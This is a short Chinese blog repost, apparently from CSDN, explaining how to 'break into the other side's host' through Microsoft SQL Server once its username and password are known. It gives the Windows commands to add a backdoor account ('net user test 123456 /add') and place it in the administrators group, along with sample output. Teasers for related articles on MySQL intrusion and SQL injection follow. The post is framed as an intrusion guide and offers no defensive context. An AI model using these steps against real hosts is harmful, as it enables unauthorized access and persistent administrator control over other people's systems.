从Mssql入手侵入对方主机

最新推荐文章于 2025-08-07 11:26:49 发布

weixin_34343000

最新推荐文章于 2025-08-07 11:26:49 发布

阅读量86

点赞数

CC 4.0 BY-SA版权

文章标签：操作系统

原文链接：https://yq.aliyun.com/articles/424602

本文介绍如何通过已知的MS SQL Server用户名和密码远程执行命令，包括添加新用户、查看用户信息及将其提升为管理员等操作。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

假设知道了对方Ms SQL Server的用户名和密码：

连上了，接下来可以执行一些dos命令。

net user查看下用户：

执行

net user test 123456 /add

添加一个用户test密码为123456

下面执行 net user test

查看下帐号test的详细信息：

用户名 test
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期从不
上次设置密码 2011/1/4 下午 10:01
密码到期 2011/2/16 下午 08:49
密码可更改 2011/1/4 下午 10:01
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。

现在把他加入管理员组 net localgroup administrators test /add

net user test再查看下。

本文转自 xcf007 51CTO博客，原文链接：http://blog.51cto.com/xcf007/471921，如需转载请自行联系原作者

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_34343000

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

通过mysql入侵win主机_通过mysql的入侵NT和win2000_MySQL

weixin_33958871的博客

02-05

266

bitsCN.com许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空，这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码，而IIS的一些其他漏洞导致源代码泄漏也可能看到数据库的账号和密码。假设我们已经拿到了数据库的密码，看看我们如何通过mysql数据库来获得该机器的一定权限。首先通常情况下，一般mysql和php配合使用，大多数NT和...

[SQL]SQL注入-ASP漏洞全接触--高级篇

11-23

1665

看完入门篇和进阶篇后，稍加练习，破解一般的网站是没问题了。但如果碰到表名列名猜不到，或程序作者过滤了一些特殊字符，怎么提高注入的成功率？怎么样提高猜解效率？请大家接着往下看高级篇。第一节、利用系统表注入SQLServer数据库SQLServer是一个功能强大的数据库系统，与操作系统也有紧密的联系，这给开发者带来了很大的方便，但另一方面，也为注入者提供了一个跳板，我们先来看看几个具体的例子

参与评论您还未登录，请先登录后发表或查看评论

通过mysql入侵win主机_通过mysql入侵NT和win2000

weixin_33174392的博客

02-05

212

通过mysql入侵NT和win2000来源：互连网作者：佚名时间：2005-10-31Tag：点击：by coolweiscoolweis@netguard.com.cn许多NT和win2000机器上面装有mysql和php。而mysql默认数据库root账号为空，这就给入侵者一个途径来入侵该机器。如果修改了数据库root的账号密码，而IIS的一些其他漏洞导致源代码泄漏也可能看到数据库的账号和密码...

MSSQL远程连接，没有SSMS，使用sqlcmd

hermanho的博客

10-02

787

MSSQL远程连接，没有SSMS，使用sqlcmd

net user

lerdor的专栏

10-11

737

F:\>net user \\YANLIN-PC 的用户帐户 ------------------------------------------------------------------------------- Administrator Guest yanlin 命令成功完成。 F:\>net user

asp+sql server

10-31

这是我收藏的资料，asp+sql server 也是我喜欢的资料

mysql入侵服务器_记通过mysql数据库成功入侵到服务器内部的渗透实战

weixin_33127399的博客

01-19

1364

1，在成功进入mysql到数据库之后，可以使用select user();命令，查看当前的用户，如果为root，则可以执行下一步操作。不为root，则需要通过其他方法提权。2，使用show variables like '%log%'及show variables like '%secure%'查看相应的日志模块和安全防御模块的开启情况。并且了解网站目录的相应的路径情况，如果没有开启，则使用下面...

常见的端口漏洞入侵主机

热门推荐

D的博客

06-05

2万+

端口漏洞利用当我们渗透一个网站时发现从网站渗透不进去的时候，就可以查看该网站主机开启了哪些端口，来从其开启的端口来进行入侵一旦端口开放的话就可以从外部访问，操作系统都有或多或少的漏洞，特殊的请求或者指令触发之后就可以提升权限实验环境同一网段的两台主机：入侵主机：kali 受害主机ip：192.168.31.69 使用kali和它本身自带的一些工具对受害主机进行入侵先利用nmap对受害主...

SQL手工注入原理&&万能密码及默认密码登陆后台

xlh006的博客

09-13

8433

SQL手工注入原理：下面就是比较笨的方法了== 一个一个试 (*￣rǒ￣) 针对于.asp后缀网 + ?id_ 在后面加入下面代码，返回正确那就是无注入点，反正就是有注入点一、什么是SQL注入 SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用...

SQL Server应用程序中的高级SQL注入

weixin_33767813的博客

03-17

193

摘要：这份文档是详细讨论SQL注入技术，它适应于比较流行的IIS+ASP+SQLSERVER平台。它讨论了哪些SQL语句能通过各种各样的方法注入到应用程序中，并且记录与攻击相关的数据确认和数据库锁定。这份文档的预期读者为与数据库通信的WEB程序的开发者和那些扮演审核WEB应用程序的安全专家。介绍： SQL是一种用于关系数据库的结构化查询语言。它分为许多种，但大多数都松散地基于美国国家...

SQL Server安全-加密术和SQL注入攻击

weixin_30889885的博客

07-18

SQL Server上的加密术 SQL Server上内置了加密术用来保护各种类型的敏感数据。在很多时候，这个加密术对于你来说是完全透明的；当数据被存储时候被加密，它们被使用的时候就会自动加密。在其他的情况下，你可以选择数据是否要被加密。SQL Server可以加密下列这些组件： ·密码 ·存储过程，视图，触发器，用户自定义函数，默认值，和规则。...

Linux安装Xinference

YXWik的博客

08-04

787

Xinference) 是一个开源平台，用于简化各种 AI 模型的运行和集成。借助Xinference，我们可以使用任何开源LLM嵌入模型和多模态模型在云端或本地环境中运行推理，并创建强大的 AI 应用。和Ollama。

Win10还未停更，对标iPad的教育版Win11也宣布停更了

meiyimin的专栏

08-06

211

无论是 Copilot 的深度整合，还是下一代硬件中 NPU（神经处理单元）的逐步标配，微软对 Windows 的未来定义已经越来越明确：不是“再造多个系统版本”，而是围绕一个智能核心，打通用户体验。然而，这样的系统虽然目标明确，却始终没有获得太多市场热情。微软试图与 Google 的 ChromeOS 和苹果的 iPad 争夺教育市场，但现实中，后两者的占有率和生态优势早已稳固，加之微软自身硬件和 OEM 合作的局限，Windows 11 SE 并未真正撼动教育设备的主流格局。

搭建私有 Linux 镜像仓库

qq_31292011的博客

08-06

308

统一管理软件包版本，确保环境一致性。：减少外网带宽消耗，提升下载速度。：减少重复下载，节省带宽成本。：内网环境下的安全软件分发。：支持无外网环境的软件安装。

SPI TFT全彩屏幕驱动开发及调试